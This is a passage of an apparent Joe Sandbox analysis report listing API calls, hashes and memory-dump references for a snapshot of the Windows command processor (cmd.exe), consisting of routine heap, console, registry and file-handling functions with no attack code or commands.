                                                                                        • Instruction Fuzzy Hash: C31108316063119BDB24A2A85C3AB3AD25C8B85F65F2C002DFD5AD61C3EA73CD40D1B1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D7727B: __iob_func.MSVCRT ref: 00D77280
                                                                                        • fprintf.MSVCRT ref: 00D85182
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Similarity
                                                                                        • API ID: __iob_funcfprintf
                                                                                        • String ID: CMD Internal Error %s$%s$Null environment
                                                                                        • API String ID: 620453056-2781220306
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 00D8351B
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 00D8352C
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                        • API String ID: 1646373207-582119455
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 00D838FB
                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 00D83907
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: RaiseFailFastException$kernelbase.dll
                                                                                        • API String ID: 1646373207-919018592
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D7539E
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D754C6
                                                                                          • Part of subcall function 00D68E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00DA8BF0,00000000,?), ref: 00D68EC3
                                                                                        Similarity
                                                                                        • API ID: memset$CurrentDirectory
                                                                                        • String ID:
                                                                                        • API String ID: 168429351-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _wcsnicmp$wcschr
                                                                                        • String ID:
                                                                                        • API String ID: 3270668897-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: iswdigit
                                                                                        • String ID:
                                                                                        • API String ID: 3849470556-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D3A
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D44
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D57
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D680F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00D71D61
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$FullNamePath
                                                                                        • String ID:
                                                                                        • API String ID: 268959451-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00D6C5BD
                                                                                        • RtlFreeHeap.NTDLL(00000000), ref: 00D6C5C4
                                                                                        • _setjmp3.MSVCRT ref: 00D6C630
                                                                                        • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 00D6C69D
                                                                                        Similarity
                                                                                        • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                                        • String ID:
                                                                                        • API String ID: 2613391085-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001,?,?,00D7BFD6,?,?,?,?,?,?,?,?), ref: 00D864D4
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                          • Part of subcall function 00D772EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00D61028,?,?,?,00D7F12E,00D8CA50,00000018,00D71E7C,00000000,00000000,00D7ACE0,00000000,00000000,?,00000104,?), ref: 00D77314
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,00D7BFD6), ref: 00D8646C
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,00D7BFD6), ref: 00D86474
                                                                                        • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,00D7BFD6), ref: 00D864B6
                                                                                        Similarity
                                                                                        • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                                        • String ID:
                                                                                        • API String ID: 129137517-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,00D8CD20,0000001C,00D858DF), ref: 00D862E6
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,00D8CD20,0000001C,00D858DF), ref: 00D86301
                                                                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 00D86340
                                                                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D8635D
                                                                                        Similarity
                                                                                        • API ID: QueryValue$ErrorLastOpen
                                                                                        • String ID:
                                                                                        • API String ID: 4270309053-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00D8A034
  • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
• GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,00D6234C,0020005D), ref: 00D8A078
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8A0AA
• ??_V@YAXPAX@Z.MSVCRT ref: 00D8A0C2
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: memset$DriveFullNamePathType
• String ID:
• API String ID: 3442494845-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• wcstol.MSVCRT ref: 00D72977
• wcstol.MSVCRT ref: 00D72987
• lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00D6E559,?,?,00000000,?), ref: 00D729FF
• lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,00D6E559,?,?,00000000,?), ref: 00D72A09
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: wcstol$lstrcmplstrcmpi
• String ID:
• API String ID: 4273384694-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00D8C56B
  • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
• GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 00D8C5A5
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D8C5BD
• ??_V@YAXPAX@Z.MSVCRT ref: 00D8C5DA
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: memset$DriveNamePathTypeVolume
• String ID:
• API String ID: 1029679093-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness
Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00D89822
• WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D892EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00D8982A
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D89841
• DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D8986E
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: File$DeleteErrorLastWrite_get_osfhandle
• String ID:
• API String ID: 2448200120-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00D89962,00000000,?,00000000,00D7CF94,00000000,?), ref: 00D6727F
• RtlFreeHeap.NTDLL(00000000), ref: 00D67286
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00D672AF
• RtlFreeHeap.NTDLL(00000000), ref: 00D672B6
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00D66231,00000000,00000000,335C4BB4), ref: 00D6630C
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D66313
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,00D6BDB3,00000000,?), ref: 00D6DD37
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6DD3E
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00D6DD53
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6DD5A
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$Process$AllocSize
• String ID:
• API String ID: 2549470565-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884B9
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884C6
• FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884EA
• SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00D68A51), ref: 00D884F2
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
• String ID:
• API String ID: 1033415088-0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D70060: wcschr.MSVCRT ref: 00D7006C
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 00D75678
• _open_osfhandle.MSVCRT ref: 00D7568C
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00D756A2
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D8122B
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
• String ID:
• API String ID: 22757656-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00D822F8), ref: 00D82514
• RtlFreeHeap.NTDLL(00000000,?,?), ref: 00D8251B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,00D822F8), ref: 00D82539
• RtlFreeHeap.NTDLL(00000000), ref: 00D82540
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,00D6885E), ref: 00D68B9D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6885E), ref: 00D68BA4
  • Part of subcall function 00D6A9D4: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D6A9C5), ref: 00D6A9D8
  • Part of subcall function 00D6A9D4: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D6A9F3
  • Part of subcall function 00D6A9D4: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D6A9FA
  • Part of subcall function 00D6A9D4: memcpy.MSVCRT ref: 00D6AA09
  • Part of subcall function 00D6A9D4: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D6AA12
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,00D6885E), ref: 00D7B5B5
• RtlFreeHeap.NTDLL(00000000,?,00D6885E), ref: 00D7B5BC
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
• String ID:
• API String ID: 197374240-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D76F48: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00D76F4F
• __set_app_type.MSVCRT ref: 00D76872
• __p__fmode.MSVCRT ref: 00D76888
• __p__commode.MSVCRT ref: 00D76896
• __setusermatherr.MSVCRT ref: 00D768B7
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00D89F24
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,00D8449C,?,?,00000001,?), ref: 00D89F2C
• _get_osfhandle.MSVCRT ref: 00D89F42
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00D8449C,?,?,00000001,?), ref: 00D89F4A
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• _get_osfhandle.MSVCRT ref: 00D6824E
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D68256
• _get_osfhandle.MSVCRT ref: 00D68264
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6826C
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00D6729C), ref: 00D672CF
• RtlFreeHeap.NTDLL(00000000), ref: 00D672D6
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 00D672DF
• RtlFreeHeap.NTDLL(00000000), ref: 00D672E6
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
  • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
  • Part of subcall function 00D6A62F: wcschr.MSVCRT ref: 00D6A635
  • Part of subcall function 00D6C570: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00D6C5BD
  • Part of subcall function 00D6C570: RtlFreeHeap.NTDLL(00000000), ref: 00D6C5C4
  • Part of subcall function 00D6C570: _setjmp3.MSVCRT ref: 00D6C630
• _wcsupr.MSVCRT ref: 00D7C21F
  • Part of subcall function 00D71A47: memset.MSVCRT ref: 00D71AE2
  • Part of subcall function 00D71A47: ??_V@YAXPAX@Z.MSVCRT ref: 00D71BA4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$Process$AllocFree_setjmp3_wcsuprmemsetwcschr
• String ID: FOR$ IF
• API String ID: 3818062306-2924197646
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
  • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
• wcschr.MSVCRT ref: 00D8BF88
• memcpy.MSVCRT ref: 00D8C008
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$AllocProcessmemcpywcschr
• String ID: &()[]{}^=;!%'+,`~
• API String ID: 3241892172-381716982
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ABE3
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BCA7
                                                                                          • Part of subcall function 00D6BC30: iswspace.MSVCRT ref: 00D6BD1D
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD39
                                                                                          • Part of subcall function 00D6BC30: wcschr.MSVCRT ref: 00D6BD5D
                                                                                          • Part of subcall function 00D6CF10: _setjmp3.MSVCRT ref: 00D6CF28
                                                                                          • Part of subcall function 00D6CF10: iswspace.MSVCRT ref: 00D6CF6B
                                                                                          • Part of subcall function 00D6CF10: wcschr.MSVCRT ref: 00D6CF8D
                                                                                          • Part of subcall function 00D6CF10: iswdigit.MSVCRT ref: 00D6CFEE
